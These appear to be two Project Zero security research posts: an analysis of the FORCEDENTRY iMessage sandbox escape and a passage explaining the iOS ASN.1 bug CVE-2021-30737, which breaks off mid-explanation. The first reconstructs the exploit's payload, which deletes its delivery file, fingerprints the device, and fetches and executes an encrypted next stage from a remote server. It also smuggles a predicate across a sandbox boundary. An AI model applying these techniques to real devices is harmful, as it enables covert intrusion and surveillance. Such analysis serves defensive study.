FORCEDENTRY: Sandbox Escape

31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)

COUNT BYTES AVG CLASS_NAME TYPE BINARY

===== ===== === ========== ==== ======

1969 469120 238.3 non-object

825 26400 32.0 JBIG2Bitmap C++ CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000 62 70 6c 69 73 74 30 30 |bplist00|

...

00000018 24 76 65 72 73 69 | $versi|

00000020 6f 6e 59 24 61 72 63 68 |onY$arch|

00000028 69 76 65 72 58 24 6f 62 |iverX$ob|

00000030 6a 65 63 74 73 54 24 74 |jectsT$t|

00000038 6f 70 |op |

00000040 4e 53 4b 65 79 65 | NSKeye|

00000048 64 41 72 63 68 69 76 65 |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystems paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

NSArray* names = @[@"one", @"two", @"three"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat:

@"SELF beginswith[c] 't'"];

NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

"FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

"FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an ASMKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

[@"/tmp/com.apple.messages" stringByAppendingPathComponent:

[ [ [ [

[NSFileManager defaultManager]

enumeratorAtPath: @"/tmp/com.apple.messages"

]

allObjects

]

filteredArrayUsingPredicate:

[

[NSPredicate predicateWithFormat:

[

[@"SELF ENDSWITH '"

stringByAppendingString: "XXX.gif"]

stringByAppendingString: "'"

] ] ] ]

firstObject

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"]

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = ["@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter]

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gifSubpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

$ egrep -Rn "$NSObject \*$arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

(CTXPCServiceSubscriptionContext *)arg1

identity:(NSObject *)arg2

completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

(CTXPCServiceSubscriptionContext *)arg1

key:(NSString *)arg2

value:(NSObject *)arg3

completion:(void (^)(NSError *))arg4;

evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

context:X

evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation: to make the predicate safe for evaluation then evaluateWithObject: and then evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT 7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

@"/System/Library/AccessibilityBundles/\

AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

NSError err;

[bundle loadAndReturnError:&err]

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\

AXSpeechImplementation.bundle/AXSpeechImplementation',

'/System/Library/AccessibilityBundles/\

AXSpeechImplementation.bundle/AXSpeechImplementation',

'/System/Library/PrivateFrameworks/\

AccessibilityUtilities.framework/AccessibilityUtilities',

'/System/Library/PrivateFrameworks/\

AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initwithcoder:] contains the following snippet:

self->condition = [coder decodeObjectOfClass:NSPredicate

forKey:@"condition"]

[self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path to which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

if (row->condition) {

return [row->condition evaluateWithObject: self->settings]

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[ [CaliCalendarAnonymizer sharedAnonymizedStrings]

setObject:

@[[NSURLComponents

componentsWithString:

@"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

bundleWithPath:@"/System/Library/PrivateFrameworks/\

SlideshowKit.framework/Frameworks/OpusFoundation.framework"

] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

objectForKey:@"0" ]

setQueryItems:

[ [ [NSArray arrayWithObject:

[NSURLQueryItem

queryItemWithName: @"m"

value:[AKDevice _hardwareModel] ]

] arrayByAddingObject:

[NSURLQueryItem

queryItemWithName: @"v"

value:[AKDevice _buildNumber] ]

] arrayByAddingObject:

[NSURLQueryItem

queryItemWithName: @"u"

value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

[AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

[AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

[NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedString]

setObject:

[NSPropertyListSerialization

propertyListWithData:

[[[NSData

dataWithContentsOfURL:

[[[CaliCalendarAnonymizer sharedAnonymizedStrings]

objectForKey:@"0"] URL]

] AES128DecryptWithPassword:NSData(XXXX)

] decompressedDataUsingAlgorithm:3 error:]

options: Class(NSConstantValueExpression)

format: Class(NSConstantValueExpression)

errors:Class(NSConstantValueExpression)

]

forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full url from the query string parameters set last earlier. That url is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]

addEntriesFromDictionary:

[[CaliCalendarAnonymizer sharedAnonymizedStrings]

objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's theadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

[[[CaliCalendarAnonymizer sharedAnonymizedStrings]

objectForKey:@"1"]

objectForKey: @"a"]

]

expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

"com.apple.PrototypeTools") {

[coder decodeObjectOfClass:NSPredicate forKey:@"condition]

...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Google Project Zero
CVE-2021-30737, @xerub's 2021 iOS ASN.1 VulnerabilityAnonymous
7 April 2022 at 16:08

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

Google Project Zero

By: Anonymous

7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as an quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Impact: Processing a maliciously crafted certification may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code.

Feeling slightly annoyed that I hadn't acted on my instincts as there was clearly something awesome lurking there I made a mental note to diff the source code once Apple released it which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the MacOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c

index f338527..5b4915a 100644

--- a/OSX/libsecurity_asn1/lib/secasn1d.c

+++ b/OSX/libsecurity_asn1/lib/secasn1d.c

@@ -434,9 +434,6 @@ loser:

PORT_ArenaRelease(cx->our_pool, state->our_mark);

state->our_mark = NULL;

}

- if (new_state != NULL) {

- PORT_Free(new_state);

- }

return NULL;

}

@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,

/*PORT_Assert (state->pending > 0); */

PORT_Assert (state->place == beforeBitString);

- if ((state->pending == 0) || (state->contents_length == 1)) {

+ if (state->pending == 0) {

if (state->dest != NULL) {

SecAsn1Item *item = (SecAsn1Item *)(state->dest);

item->Data = NULL;

item->Length = 0;

state->place = beforeEndOfContents;

- }

- if(state->contents_length == 1) {

- /* skip over (unused) remainder byte */

- return 1;

- }

- else {

- return 0;

+ return 0;

}

The first change (removing the PORT_Free) is immaterial for Apple's use case as it's fixing a double free which doesn't impact Apple's build. It's only relevant when "allocator marks" are enabled and this feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 1 tells us that this is a primitive encoding which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 0 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0 which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0 , which is encoded as two NULL bytes.

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {

{

SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,

// may be constructed

0, // offset: in dest/src

NULL, // sub: subtemplate for indirection

sizeof(SecAsn1Item) // size: of output structure

}

};

A SecASN1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring then call the parser:

SecAsn1Item decoded = {0};

PLArenaPool* pool = PORT_NewArena(1024);

SECStatus status =

SEC_ASN1Decode(pool, // pool: arena for destination allocations

&decoded, // dest: decoded encoded items in to here

&simple_bitstring_template, // template

asn1_bytes, // buf: asn1 input bytes

asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {

SEC_ASN1DecoderContext *top;

const SecAsn1Template *theTemplate;

void *dest;

struct sec_asn1d_state_struct *parent;

struct sec_asn1d_state_struct *child;

sec_asn1d_parse_place place;

unsigned long contents_length;

unsigned long pending;

unsigned long consumed;

int depth;

} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus

SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,

const char *buf, size_t len)

The current state is stored in the context object's current field, and that current state's place field determines the current state which the parser is in. Those states are defined here:

typedef enum {

beforeIdentifier,

duringIdentifier,

afterIdentifier,

beforeLength,

duringLength,

afterLength,

beforeBitString,

duringBitString,

duringConstructedString,

duringGroup,

duringLeaf,

duringSaveEncoding,

duringSequence,

afterConstructedString,

afterGroup,

afterExplicit,

afterImplicit,

afterInline,

afterPointer,

afterSaveEncoding,

beforeEndOfContents,

duringEndOfContents,

afterEndOfContents,

beforeChoice,

duringChoice,

afterChoice,

notInUse

} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

switch (state->place) {

case beforeIdentifier:

consumed = sec_asn1d_parse_identifier (state, buf, len);

what = SEC_ASN1_Identifier;

break;

case duringIdentifier:

consumed = sec_asn1d_parse_more_identifier (state, buf, len);

what = SEC_ASN1_Identifier;

break;

case afterIdentifier:

sec_asn1d_confirm_identifier (state);

break;

...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

state->place = duringSequence;

state = sec_asn1d_push_state (state->top, state->theTemplate + 1,

state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf which copies the raw encoded string bytes for example simply memcpy's into the output buffer with no bounds checks that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {

size_t Length;

uint8_t * __nullable Data;

} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

